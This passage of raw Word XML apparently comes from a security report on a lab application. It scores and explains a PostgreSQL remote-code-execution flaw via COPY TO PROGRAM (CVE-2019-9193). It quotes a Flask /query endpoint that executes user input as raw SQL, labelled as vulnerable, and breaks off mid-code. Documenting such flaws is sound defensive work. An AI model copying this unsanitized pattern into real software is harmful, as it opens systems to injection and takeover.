      </w:r>
    </w:p>
    <w:p w14:paraId="0D69B2C7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC44FA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1B3A6B"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>3. Vulnerability 1 — PostgreSQL RCE via COPY TO PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEEE5A4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EC8E9C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>PostgreSQL Remote Code Execution via COPY TO PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7327BBD4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>CVE-2019-9193</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DA6F4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>CWE-78 — OS Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DAD10E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Component: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>vuln1-app (Flask) + vuln1-db (PostgreSQL 12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292EDF0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposed Port: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>5001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BEE095" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Versions: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>PostgreSQL 9.3 through 12.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABAB083" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="57125925" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 CVSS v3.1 Scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2CC2F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector String: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>CVSS:3.1/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>AC:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>PR:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>UI:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/S:C/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E902EEA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Score: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>9.0 — CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64D358" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E136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E13696" w14:paraId="6FDCAFA7"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30CDF6A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</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FE3B681" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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3DDD5A44" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="0AC257E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4B886B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector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BD0FF7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network</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1A5F2F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploited entirely over HTTP; no physical or adjacent access needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="78A641C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CB2295B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Complexity</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9E96100" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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93B07C7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No race conditions or special configurations required; exploit is deterministic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="52AD75D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3612A9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileges Required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76AD0B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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D95C0E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Endpoint has no authentication; minimal access assumed for conservative scoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="5971981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38F1432" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User Interaction</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306A081" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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0481C47" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fully automated; no victim action required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="7C250BA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E4F2C9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope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4304F3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Changed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21C8E7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability crosses from the database into the host OS — scope change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="5FD5A6F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43DC9CF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality</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173DBA6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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4BE33CB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> can read any file on the container filesystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="518A5BE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736916" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Integrity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934789" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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2C24BD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> can write files, plant web shells, or corrupt the OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="1F66B07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3F550EA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Availability</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52DF53A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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F259234" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> can terminate processes or corrupt the database files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="418C2AA2" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="394C502F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FACF1EB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>This vulnerability requires two independent failures to both be present simultaneously. Fixing either one alone is sufficient to prevent exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C98BDA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Failure 1 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SQL Execution (Application Layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17070EFA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Flask app exposes a /query endpoint that accepts a q parameter and executes it directly as raw SQL against the PostgreSQL database. There is no input validation, no parameterization, and no allowlist of permitted query types. The vulnerable pattern in app.py is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D64C10" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># VULNERABLE — user input executed as raw SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30C0FB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.route</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('/query')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65681561" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65090CEB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request.args.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'q</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>', '</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274175AE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>db.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># No sanitization whatsoever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C53AE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
